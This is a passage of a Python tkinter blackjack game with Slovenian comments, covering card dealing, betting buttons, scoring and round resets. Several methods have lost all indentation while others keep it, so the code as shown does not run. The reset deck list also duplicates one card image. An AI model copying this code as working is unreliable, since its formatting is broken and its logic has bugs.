'karte/46.gif', 'karte/47.gif', 'karte/48.gif', 'karte/49.gif', 'karte/50.gif',
'karte/51.gif', 'karte/52.gif']
self.credit = 1000 #toliko dobimo na zacetku
self.vsotaStave = 0 #trenutna stava
self.scorePlayer = 0 #tocke igralca
self.scoreDealer = 0 #tocke dealerja
#seznam igralcevih kart
self.indexIgralceveKarte = 0 #katero karto damo na platno, dve karti dobimo ob inic. izbiramo tretjo
self.sezKartIgralec = ['','',''] #dejanska imena kart za sklicevanje
self.sezKartIgralecPlatno = ['','',''] #da bodo karte vidne na zaslonu
#Pozicja (x,y) za igralceve karte
self.pX = 260
self.pY = 350
#seznam dealerjevih kart
self.indexDealerjeveKarte = 0 #katero karto damo na platno, dve karti dobimo ob inic. izbiramo tretjo
self.sezKartDealer = ['','',''] #dejanska imena kart za sklicevanje
self.sezKartDealerPlatno = ['','',''] #da bodo karte vidne na zaslonu
#Pozicja (x,y) za dealerjeve karte
self.dX = 260
self.dY = 120
#####
#####Napisi
#Zgolj napis kje so igralceve karte
self.napisIgralec = tkinter.Label(text = 'Player:', bg = 'green', fg = 'blue', font = ('Helvetica', 18, 'bold'))
self.napisIgralecNaPlatnu = self.platno.create_window(55, 280, window = self.napisIgralec)
#Zgolj napis kje do Dealerjeve karte
self.napisDealer = tkinter.Label(text = 'Dealer:', bg = 'green', fg = 'red', font = ('Helvetica', 18, 'bold'))
self.napisDealerNaPlatnu = self.platno.create_window(55, 50, window = self.napisDealer)
#Zgolj napis, da je pod tem napisom igralcevo financno stanje
self.napisCredit = tkinter.Label(text = 'Credit:', bg = 'green', font = ('Helvetica', 23, 'bold'))
self.napisCreditNaPlatnu = self.platno.create_window(600, 40, window = self.napisCredit)
#Zgolj napis, da je pod tem napisom igralceva trenutna stava
self.napisCurrentBet = tkinter.Label(text = 'Current Bet:', bg = 'green', font = ('Helvetica', 23, 'bold'))
self.napisCurrentBetNaPlatnu = self.platno.create_window(600, 250, window = self.napisCurrentBet)
#Dejanski napis, ki prikazuje igralcevo financno stanje
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
#Dejanski napis, ki prikazuje igralcevo trenutno stavo
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 295, window = self.vsotaStaveNapis)
##Tukaj so napisi za navodila igralcu
self.pWin = tkinter.Label(text = 'Player Wins!', bg = 'green', font = ('Helvetica', 24, 'bold'))
self.pBlackjack = tkinter.Label(text = 'Blackjack! Player Wins!', bg = 'green', font = ('Helvetica', 21, 'bold'))
self.pBust = tkinter.Label(text = 'Player Busts!', bg = 'green', fg = 'red', font = ('Helvetica', 21, 'bold'))
self.dWin = tkinter.Label(text = 'Delaer Wins!', bg = 'green', fg = 'red', font = ('Helvetica', 23, 'bold'))
self.dBlackjack = tkinter.Label(text = 'Dealer hits Blackjack! You Lose!', bg = 'green', font = ('Helvetica', 25, 'bold'))
self.dBust = tkinter.Label(text = 'Dealer Busts! Player Wins!', bg = 'green', font = ('Helvetica', 25, 'bold'))
self.draw = tkinter.Label(text = 'It is a Draw!', bg = 'green', font = ('Helvetica', 23, 'bold'))
self.hitORstand = tkinter.Label(text = 'Hit or Stand', bg = 'green', font = ('Helvetica', 23, 'bold'))
self.maxReached = tkinter.Label(text = 'Maximum of 5 cards reached!', bg = 'green', fg = 'red', font = ('Helvetica', 15, 'bold'))
self.placeBet = tkinter.Label(text = 'Place your bet and decide wether to Hit or Stand', bg = 'green', font = ('Helvetica', 11, 'bold'))
self.emptyBank = tkinter.Label(text = 'Player ran out of money. Please choose new game.', bg = 'green', font = ('Helvetica', 8, 'bold'))
#####
#####Gumbi
self.gumbHit = tkinter.Button(master, text = 'HIT', command = self.hit, state = 'disabled')
self.gumbHitNaPlatnu = self.platno.create_window(30, 450, window = self.gumbHit)
self.gumbStand = tkinter.Button(master, text = 'STAND', command = self.stand, state = 'disabled')
self.gumbStandNaPlatnu = self.platno.create_window(90, 450, window = self.gumbStand)
self.gumbNaprej = tkinter.Button(master, text = 'Next Round', command = self.naslednjaRoka)
#To bos se potreboval
self.gumbNaprejNaPlatnu = ''
self.gumb10 = tkinter.Button(master, text = '$10', command = self.dodaj10)
self.gumb10NaPlatnu = self.platno.create_window(300, 450, window = self.gumb10)
self.gumb20 = tkinter.Button(master, text = '$20', command = self.dodaj20)
self.gumb20NaPlatnu = self.platno.create_window(360, 450, window = self.gumb20)
self.gumb50 = tkinter.Button(master, text = '$50', command = self.dodaj50)
self.gumb50NaPlatnu = self.platno.create_window(420, 450, window = self.gumb50)
#####
#Prva vrstica
#self.SlikaNaPlatnu11 = self.platno.create_image(60, 120, image = self.karta1)
#self.SlikaNaPlatnu12 = self.platno.create_image(160, 120, image = self.karta1)
#self.SlikaNaPlatnu13 = self.platno.create_image(260, 120, image = self.karta1)
#self.SlikaNaPlatnu14 = self.platno.create_image(360, 120, image = self.karta1)
#self.SlikaNaPlatnu15 = self.platno.create_image(460, 120, image = self.karta1)
#Druga vrstica
#self.SlikaNaPlatnu21 = self.platno.create_image(60, 350, image = self.karta2)
#self.SlikaNaPlatnu22 = self.platno.create_image(160, 350, image = self.karta2)
#self.SlikaNaPlatnu23 = self.platno.create_image(260, 350, image = self.karta2)
#self.SlikaNaPlatnu24 = self.platno.create_image(360, 350, image = self.karta2)
#self.SlikaNaPlatnu25 = self.platno.create_image(460, 350, image = self.karta2)
#Tukaj inicializiramo igro...
random.shuffle(self.sezKart)#premesamo kup kart
##Najprej inicializiramo igralca
self.prvaKartaPlayer = self.sezKart.pop() #izberemo prvo karto igralcu
self.vrednost = self.vrednostKarte(self.prvaKartaPlayer) # dolocimo vrednost prve karte
self.scorePlayer += self.vrednost
self.prvaKartaPlayer = tkinter.PhotoImage(file = self.prvaKartaPlayer) #Playing with fire
self.prvaKartaPlayerNaPlatnu = self.platno.create_image(60, 350, image = self.prvaKartaPlayer)
self.drugaKartaPlayer = self.sezKart.pop() #izberemo drugo karto igralcu
self.vrednost = self.vrednostKarte(self.drugaKartaPlayer) # dolocimo vrednost druge karte
#ce dobimo se enega asa bi presegli 21, torej se as steje kot 1
if self.vrednost == 11 and self.scorePlayer > 10:
self.vrednost = 1
self.scorePlayer += self.vrednost
self.drugaKartaPlayer = tkinter.PhotoImage(file = self.drugaKartaPlayer) #Playing with fire
self.drugaKartaPlayerNaPlatnu = self.platno.create_image(160, 350, image = self.drugaKartaPlayer)
##
##Potem inicializiramo dealerja
self.prvaKartaDealer = self.sezKart.pop() #izberemo prvo karto dealerju
self.vrednost = self.vrednostKarte(self.prvaKartaDealer) # dolocimo vrednost prve karte
self.scoreDealer += self.vrednost
self.prvaKartaDealer = tkinter.PhotoImage(file = self.prvaKartaDealer) #Playing with fire
self.prvaKartaDealerNaPlatnu = self.platno.create_image(60, 120, image = self.prvaKartaDealer)
self.drugaKartaDealer = self.sezKart.pop() #izberemo drugo karto dealerju
self.vrednost = self.vrednostKarte(self.drugaKartaDealer) # dolocimo vrednost druge karte
#ce dobimo se enega asa bi presegli 21, torej se as steje kot 1
if self.vrednost == 11 and self.scoreDealer > 10:
self.vrednost = 1
self.scoreDealer += self.vrednost
self.drugaKartaDealer = tkinter.PhotoImage(file = self.drugaKartaDealer) #Playing with fire
self.drugaKartaDealerNaPlatnu = self.platno.create_image(160, 120, image = self.drugaKartaDealer)
#Po pravilih je druga karta dealerja zakrita
self.zakritaKarta = tkinter.PhotoImage(file = 'karte/back.gif')
self.zakritaKartaNaPlatnu = self.platno.create_image(160, 120, image = self.zakritaKarta)
##
#Na platno postavimo navodila, kaj naj igralec stori
self.navodilaPlatno = self.platno.create_window(270, 230, window = self.placeBet)
def vrednostKarte(self, karta):
if karta == 'karte/1.gif' or karta == 'karte/2.gif' or karta == 'karte/3.gif' or karta == 'karte/4.gif':
return 11
if karta == 'karte/5.gif' or karta == 'karte/6.gif' or karta == 'karte/7.gif' or karta == 'karte/8.gif' or karta == 'karte/9.gif' or karta == 'karte/10.gif' or karta == 'karte/11.gif' or karta == 'karte/12.gif' or karta == 'karte/13.gif' or karta == 'karte/14.gif' or karta == 'karte/15.gif' or karta == 'karte/16.gif' or karta == 'karte/17.gif' or karta == 'karte/18.gif' or karta == 'karte/19.gif' or karta == 'karte/20.gif':
return 10
if karta == 'karte/21.gif' or karta == 'karte/22.gif' or karta == 'karte/23.gif' or karta == 'karte/24.gif':
return 9
if karta == 'karte/25.gif' or karta == 'karte/26.gif' or karta == 'karte/27.gif' or karta == 'karte/28.gif':
return 8
if karta == 'karte/29.gif' or karta == 'karte/30.gif' or karta == 'karte/31.gif' or karta == 'karte/32.gif':
return 7
if karta == 'karte/33.gif' or karta == 'karte/34.gif' or karta == 'karte/35.gif' or karta == 'karte/36.gif':
return 6
if karta == 'karte/37.gif' or karta == 'karte/38.gif' or karta == 'karte/39.gif' or karta == 'karte/40.gif':
return 5
if karta == 'karte/41.gif' or karta == 'karte/42.gif' or karta == 'karte/43.gif' or karta == 'karte/44.gif':
return 4
if karta == 'karte/45.gif' or karta == 'karte/46.gif' or karta == 'karte/47.gif' or karta == 'karte/48.gif':
return 3
if karta == 'karte/49.gif' or karta == 'karte/50.gif' or karta == 'karte/51.gif' or karta == 'karte/52.gif':
return 2
def dodaj10(self):
if self.credit >= 10:
self.gumbHit.config(state = 'normal')
self.gumbStand.config(state = 'normal')
#stava se poveca
self.vsotaStave += 10
self.platno.delete(self.vsotaStaveNapisPlatno)
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
#credit se zmanjsa
self.credit -= 10
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
else:
pass
def dodaj20(self):
if self.credit >= 20 :
self.gumbHit.config(state = 'normal')
self.gumbStand.config(state = 'normal')
#stava se poveca
self.vsotaStave += 20
self.platno.delete(self.vsotaStaveNapisPlatno)
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
#credit se zmanjsa
self.credit -= 20
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
else:
pass
def dodaj50(self):
if self.credit >= 50:
self.gumbHit.config(state = 'normal')
self.gumbStand.config(state = 'normal')
#stava se poveca
self.vsotaStave += 50
self.platno.delete(self.vsotaStaveNapisPlatno)
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
#credit se zmanjsa
self.credit -= 50
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
else:
pass
    def hit(self):
        """Deal one more card to the player ("hit").

        Enforces the 5-card maximum (two initial cards + three hits),
        adds the card's value to the player's score (an ace counts as 1
        instead of 11 when the hand is already above 10), draws the card
        on the canvas, and settles the round immediately on exactly 21
        (player wins, bet paid out double) or over 21 (player busts, bet
        lost).  Betting buttons are locked once a card has been taken.
        """
        self.gumbStand.config(state = 'normal')
        self.gumb10.config(state = 'disabled')
        self.gumb20.config(state = 'disabled')
        self.gumb50.config(state = 'disabled')
        if self.indexIgralceveKarte >= 3: #only three extra slots exist -> at most 5 cards in hand
            self.platno.delete(self.navodilaPlatno)
            self.navodilaPlatno = self.platno.create_window(310, 230, window = self.maxReached)
            self.gumbHit.config(state = 'disabled')
        else:
            self.platno.delete(self.navodilaPlatno)
            self.navodilaPlatno = self.platno.create_window(310, 230, window = self.hitORstand)
            #take the next card from the shuffled deck
            self.sezKartIgralec[self.indexIgralceveKarte] = self.sezKart.pop()
            #determine the value of the drawn card
            self.vrednost = self.vrednostKarte(self.sezKartIgralec[self.indexIgralceveKarte])
            #an ace counts as 1 instead of 11 when 11 would push the hand too high
            if self.vrednost == 11 and self.scorePlayer > 10:
                self.vrednost = 1
            #add the card to the running total
            self.scorePlayer += self.vrednost
            #load the image (rebinding keeps a live reference so it can be shown)
            self.sezKartIgralec[self.indexIgralceveKarte] = tkinter.PhotoImage(file = self.sezKartIgralec[self.indexIgralceveKarte])
            #show the card on the canvas
            self.sezKartIgralecPlatno[self.indexIgralceveKarte] = self.platno.create_image(self.pX, self.pY, image = self.sezKartIgralec[self.indexIgralceveKarte])
            if self.scorePlayer == 21:
                #tell the player what happened
                self.platno.delete(self.navodilaPlatno)
                self.navodilaPlatno = self.platno.create_window(310, 230, window = self.pBlackjack)
                #the player won, so pay out double the bet
                self.credit += (self.vsotaStave*2)
                self.vsotaStave = 0
                self.platno.delete(self.creditNapisPlatno)
                self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
                self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
                self.platno.delete(self.vsotaStaveNapisPlatno)
                self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
                self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
                self.gumbHit.config(state = 'disabled')
                self.gumbStand.config(state = 'disabled')
                self.gumb10.config(state = 'disabled')
                self.gumb20.config(state = 'disabled')
                self.gumb50.config(state = 'disabled')
                self.gumbNaprejNaPlatnu = self.platno.create_window(610, 400, window = self.gumbNaprej)
                #NOTE(review): after a payout the credit seems unable to be 0 - confirm
                if self.credit == 0:
                    #bankroll is empty: game over, only the menu's "New Game" helps
                    self.platno.delete(self.navodilaPlatno)
                    self.navodilaPlatno = self.platno.create_window(270, 230, window = self.emptyBank)
                    self.gumb10.config(state = 'disabled')
                    self.gumb20.config(state = 'disabled')
                    self.gumb50.config(state = 'disabled')
                    self.gumbHit.config(state = 'disabled')
                    self.gumbStand.config(state = 'disabled')
                    self.platno.delete(self.gumbNaprejNaPlatnu)
            if self.scorePlayer > 21:
                #tell the player what happened
                self.platno.delete(self.navodilaPlatno)
                self.navodilaPlatno = self.platno.create_window(310, 230, window = self.pBust)
                #the player busted, so the current bet is lost
                self.vsotaStave = 0
                self.platno.delete(self.creditNapisPlatno)
                self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
                self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
                self.platno.delete(self.vsotaStaveNapisPlatno)
                self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
                self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
                self.gumbHit.config(state = 'disabled')
                self.gumbStand.config(state = 'disabled')
                self.gumb10.config(state = 'disabled')
                self.gumb20.config(state = 'disabled')
                self.gumb50.config(state = 'disabled')
                self.gumbNaprejNaPlatnu = self.platno.create_window(610, 400, window = self.gumbNaprej)
                if self.credit == 0:
                    #bankroll is empty: game over, only the menu's "New Game" helps
                    self.platno.delete(self.navodilaPlatno)
                    self.navodilaPlatno = self.platno.create_window(270, 230, window = self.emptyBank)
                    self.gumb10.config(state = 'disabled')
                    self.gumb20.config(state = 'disabled')
                    self.gumb50.config(state = 'disabled')
                    self.gumbHit.config(state = 'disabled')
                    self.gumbStand.config(state = 'disabled')
                    self.platno.delete(self.gumbNaprejNaPlatnu)
            self.indexIgralceveKarte += 1 #advance to the next free card slot
            self.pX += 100 #shift right so the next card is drawn beside this one
    def stand(self):
        """Finish the player's turn: reveal the dealer's hidden card and
        let the dealer draw until the dealer's hand reaches at least 15.

        An ace counts as 1 instead of 11 when the dealer's hand is already
        above 10.  A dealer bust (> 21) pays the player double the bet; a
        dealer 21 takes the bet.  Afterwards oceniIgro() compares the hands.
        NOTE(review): oceniIgro() runs unconditionally, even after the
        bust/21 branches above already settled the round; its conditions
        then match no branch, so it only re-disables buttons - confirm.
        """
        self.platno.delete(self.zakritaKartaNaPlatnu)
        while self.scoreDealer < 15:
            #take the next card from the shuffled deck
            self.sezKartDealer[self.indexDealerjeveKarte] = self.sezKart.pop()
            #determine the value of the drawn card
            self.vrednost = self.vrednostKarte(self.sezKartDealer[self.indexDealerjeveKarte])
            #an ace counts as 1 instead of 11 when that suits the hand better
            if self.vrednost == 11 and self.scoreDealer > 10:
                self.vrednost = 1
            self.scoreDealer += self.vrednost
            #load the image (rebinding keeps a live reference so it can be shown)
            self.sezKartDealer[self.indexDealerjeveKarte] = tkinter.PhotoImage(file = self.sezKartDealer[self.indexDealerjeveKarte])
            #show the card on the canvas
            self.sezKartDealerPlatno[self.indexDealerjeveKarte] = self.platno.create_image(self.dX, self.dY, image = self.sezKartDealer[self.indexDealerjeveKarte])
            self.indexDealerjeveKarte += 1 #advance to the next free card slot
            self.dX += 100 #shift right so the next card is drawn beside this one
        if self.scoreDealer > 21:
            #tell the player what happened
            self.platno.delete(self.navodilaPlatno)
            self.navodilaPlatno = self.platno.create_window(310, 230, window = self.dBust)
            #the player won, so pay out double the bet
            self.credit += (self.vsotaStave*2)
            self.vsotaStave = 0
            self.platno.delete(self.creditNapisPlatno)
            self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
            self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
            self.platno.delete(self.vsotaStaveNapisPlatno)
            self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
            self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
            self.gumbHit.config(state = 'disabled')
            self.gumbStand.config(state = 'disabled')
            self.gumb10.config(state = 'disabled')
            self.gumb20.config(state = 'disabled')
            self.gumb50.config(state = 'disabled')
            self.gumbNaprejNaPlatnu = self.platno.create_window(610, 400, window = self.gumbNaprej)
            if self.credit == 0:
                #bankroll is empty: game over, only the menu's "New Game" helps
                self.platno.delete(self.navodilaPlatno)
                self.navodilaPlatno = self.platno.create_window(270, 230, window = self.emptyBank)
                self.gumb10.config(state = 'disabled')
                self.gumb20.config(state = 'disabled')
                self.gumb50.config(state = 'disabled')
                self.gumbHit.config(state = 'disabled')
                self.gumbStand.config(state = 'disabled')
                self.platno.delete(self.gumbNaprejNaPlatnu)
        elif self.scoreDealer == 21:
            #tell the player what happened
            self.platno.delete(self.navodilaPlatno)
            self.navodilaPlatno = self.platno.create_window(310, 230, window = self.dBlackjack)
            #the player lost, so the current bet is gone
            self.vsotaStave = 0
            self.platno.delete(self.creditNapisPlatno)
            self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
            self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
            self.platno.delete(self.vsotaStaveNapisPlatno)
            self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
            self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
            self.gumbHit.config(state = 'disabled')
            self.gumbStand.config(state = 'disabled')
            self.gumb10.config(state = 'disabled')
            self.gumb20.config(state = 'disabled')
            self.gumb50.config(state = 'disabled')
            self.gumbNaprejNaPlatnu = self.platno.create_window(610, 400, window = self.gumbNaprej)
            if self.credit == 0:
                #bankroll is empty: game over, only the menu's "New Game" helps
                self.platno.delete(self.navodilaPlatno)
                self.navodilaPlatno = self.platno.create_window(270, 230, window = self.emptyBank)
                self.gumb10.config(state = 'disabled')
                self.gumb20.config(state = 'disabled')
                self.gumb50.config(state = 'disabled')
                self.gumbHit.config(state = 'disabled')
                self.gumbStand.config(state = 'disabled')
                self.platno.delete(self.gumbNaprejNaPlatnu)
        self.oceniIgro()
    def oceniIgro(self):
        '''Settle a round in which nobody exceeded 21 and nobody hit
        blackjack: compare the two scores, pay out or take the bet, update
        the money labels on the canvas and offer the "Next Round" button.

        NOTE(review): on a draw only half of the bet (rounded up via
        math.ceil) is refunded; a push normally returns the full bet -
        confirm this house rule is intended.'''
        if self.scorePlayer > self.scoreDealer:
            #player wins: pay out double the bet
            self.platno.delete(self.navodilaPlatno)
            self.navodilaPlatno = self.platno.create_window(310, 230, window = self.pWin)
            self.credit += (self.vsotaStave*2)
            self.vsotaStave = 0
            self.platno.delete(self.creditNapisPlatno)
            self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
            self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
            self.platno.delete(self.vsotaStaveNapisPlatno)
            self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
            self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
            self.gumbNaprejNaPlatnu = self.platno.create_window(610, 400, window = self.gumbNaprej)
            if self.credit == 0:
                #bankroll is empty: game over, only the menu's "New Game" helps
                self.platno.delete(self.navodilaPlatno)
                self.navodilaPlatno = self.platno.create_window(270, 230, window = self.emptyBank)
                self.gumb10.config(state = 'disabled')
                self.gumb20.config(state = 'disabled')
                self.gumb50.config(state = 'disabled')
                self.gumbHit.config(state = 'disabled')
                self.gumbStand.config(state = 'disabled')
                self.platno.delete(self.gumbNaprejNaPlatnu)
        elif self.scorePlayer == self.scoreDealer:
            #draw: refund half of the bet (rounded up)
            self.platno.delete(self.navodilaPlatno)
            self.navodilaPlatno = self.platno.create_window(310, 230, window = self.draw)
            self.credit += int(math.ceil(0.5 * self.vsotaStave))
            self.vsotaStave = 0
            self.platno.delete(self.creditNapisPlatno)
            self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
            self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
            self.platno.delete(self.vsotaStaveNapisPlatno)
            self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
            self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
            self.gumbNaprejNaPlatnu = self.platno.create_window(610, 400, window = self.gumbNaprej)
            if self.credit == 0:
                #bankroll is empty: game over, only the menu's "New Game" helps
                self.platno.delete(self.navodilaPlatno)
                self.navodilaPlatno = self.platno.create_window(270, 230, window = self.emptyBank)
                self.gumb10.config(state = 'disabled')
                self.gumb20.config(state = 'disabled')
                self.gumb50.config(state = 'disabled')
                self.gumbHit.config(state = 'disabled')
                self.gumbStand.config(state = 'disabled')
                self.platno.delete(self.gumbNaprejNaPlatnu)
        elif self.scoreDealer > self.scorePlayer and self.scoreDealer <= 21:
            #dealer wins: the player's bet is lost
            self.platno.delete(self.navodilaPlatno)
            self.navodilaPlatno = self.platno.create_window(310, 230, window = self.dWin)
            self.vsotaStave = 0
            self.platno.delete(self.creditNapisPlatno)
            self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
            self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
            self.platno.delete(self.vsotaStaveNapisPlatno)
            self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
            self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
            self.gumbNaprejNaPlatnu = self.platno.create_window(610, 400, window = self.gumbNaprej)
            if self.credit == 0:
                #bankroll is empty: game over, only the menu's "New Game" helps
                self.platno.delete(self.navodilaPlatno)
                self.navodilaPlatno = self.platno.create_window(270, 230, window = self.emptyBank)
                self.gumb10.config(state = 'disabled')
                self.gumb20.config(state = 'disabled')
                self.gumb50.config(state = 'disabled')
                self.gumbHit.config(state = 'disabled')
                self.gumbStand.config(state = 'disabled')
                self.platno.delete(self.gumbNaprejNaPlatnu)
        #lock all play buttons until the next round starts
        self.gumbHit.config(state = 'disabled')
        self.gumbStand.config(state = 'disabled')
        self.gumb10.config(state = 'disabled')
        self.gumb20.config(state = 'disabled')
        self.gumb50.config(state = 'disabled')
def naslednjaRoka(self):
'''Metoda se izvede ob zakljucku vsake igre. Njen glavni namen je pobrisati stvari, ki so ostale
iz prejsnje igre iz platna, ter ponovno nastaviti nekatere spremenljivke. Npr. seznam kart mora, biti
zopet poln, pa se premesati ga moremo. Poleg tega moramo se ponastaviti tocke igralca in
dealerja na 0.'''
##Najprej pobrisemo vse kar bomo hoteli imeti na platnu na novo
self.platno.delete(self.navodilaPlatno) #To moramo najprej, drugace bodo prekrivanja
#pobrisemo dve karte ob inicializaciji
self.platno.delete(self.prvaKartaPlayer)
self.platno.delete(self.prvaKartaDealer)
self.platno.delete(self.drugaKartaPlayer)
self.platno.delete(self.drugaKartaDealer)
#Ponovno nastavimo tudi tri karte, ki jih dobimo kasneje
for i in range(0, 3):
self.sezKartIgralec[i] = ''
self.sezKartDealer[i] = ''
self.sezKartIgralecPlatno[i] = ''
self.sezKartDealerPlatno[i] = ''
##
##<NAME>
self.sezKart = ['karte/1.gif', 'karte/2.gif', 'karte/3.gif', 'karte/4.gif', 'karte/5.gif',
'karte/6.gif', 'karte/7.gif', 'karte/8.gif', 'karte/9.gif', 'karte/10.gif',
'karte/11.gif', 'karte/12.gif', 'karte/13.gif', 'karte/4.gif', 'karte/15.gif',
'karte/16.gif', 'karte/17.gif', 'karte/18.gif', 'karte/19.gif', 'karte/20.gif',
'karte/21.gif', 'karte/22.gif', 'karte/23.gif', 'karte/24.gif', 'karte/25.gif',
'karte/26.gif', 'karte/27.gif', 'karte/28.gif', 'karte/29.gif', 'karte/30.gif',
'karte/31.gif', 'karte/32.gif', 'karte/33.gif', 'karte/34.gif', 'karte/35.gif',
'karte/36.gif', 'karte/37.gif', 'karte/38.gif', 'karte/39.gif', 'karte/40.gif',
'karte/41.gif', 'karte/42.gif', 'karte/43.gif', 'karte/44.gif', 'karte/45.gif',
'karte/46.gif', 'karte/47.gif', 'karte/48.gif', 'karte/49.gif', 'karte/50.gif',
'karte/51.gif', 'karte/52.gif']
self.scorePlayer = 0
self.scoreDealer = 0
self.pX = 260
self.dX = 260
self.indexIgralceveKarte = 0
self.indexDealerjeveKarte = 0
##
##Ponovno inicializiramo igro
random.shuffle(self.sezKart)#premesamo kup kart
##Najprej inicializiramo igralca
self.prvaKartaPlayer = self.sezKart.pop() #izberemo prvo karto igralcu
self.scorePlayer += self.vrednostKarte(self.prvaKartaPlayer) # dolocimo vrednost prve karte
self.prvaKartaPlayer = tkinter.PhotoImage(file = self.prvaKartaPlayer) #Playing with fire
self.prvaKartaPlayerNaPlatnu = self.platno.create_image(60, 350, image = self.prvaKartaPlayer)
self.drugaKartaPlayer = self.sezKart.pop() #izberemo drugo karto igralcu
self.scorePlayer += self.vrednostKarte(self.drugaKartaPlayer) # dolocimo vrednost druge karte
self.drugaKartaPlayer = tkinter.PhotoImage(file = self.drugaKartaPlayer) #Playing with fire
self.drugaKartaPlayerNaPlatnu = self.platno.create_image(160, 350, image = self.drugaKartaPlayer)
##
##Potem inicializiramo dealerja
self.prvaKartaDealer = self.sezKart.pop() #izberemo prvo karto dealerju
self.scoreDealer += self.vrednostKarte(self.prvaKartaDealer) # dolocimo vrednost prve karte
self.prvaKartaDealer = tkinter.PhotoImage(file = self.prvaKartaDealer) #Playing with fire
self.prvaKartaDealerNaPlatnu = self.platno.create_image(60, 120, image = self.prvaKartaDealer)
self.drugaKartaDealer = self.sezKart.pop() #izberemo drugo karto dealerju
self.scoreDealer += self.vrednostKarte(self.drugaKartaDealer) # dolocimo vrednost druge karte
self.drugaKartaDealer = tkinter.PhotoImage(file = self.drugaKartaDealer) #Playing with fire
self.drugaKartaDealerNaPlatnu = self.platno.create_image(160, 120, image = self.drugaKartaDealer)
#Po pravilih je druga karta dealerja zakrita
self.zakritaKarta = tkinter.PhotoImage(file = 'karte/back.gif')
self.zakritaKartaNaPlatnu = self.platno.create_image(160, 120, image = self.zakritaKarta)
##
#Na platno postavimo navodila, kaj naj igralec stori
self.navodilaPlatno = self.platno.create_window(270, 230, window = self.placeBet)
#Ponastavimo se gumbe
self.gumbHit.config(state = 'disabled')
self.gumbStand.config(state = 'disabled')
self.gumb10.config(state = 'normal')
self.gumb20.config(state = 'normal')
self.gumb50.config(state = 'normal')
self.platno.delete(self.gumbNaprejNaPlatnu)
def newGame(self):
'''Metoda se uporablja, ko igralec ostane brez denarja. Lahko pa se kliče
za svež začetek'''
self.credit = 1000
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
self.vsotaStave = 0
self.platno.delete(self.vsotaStaveNapisPlatno)
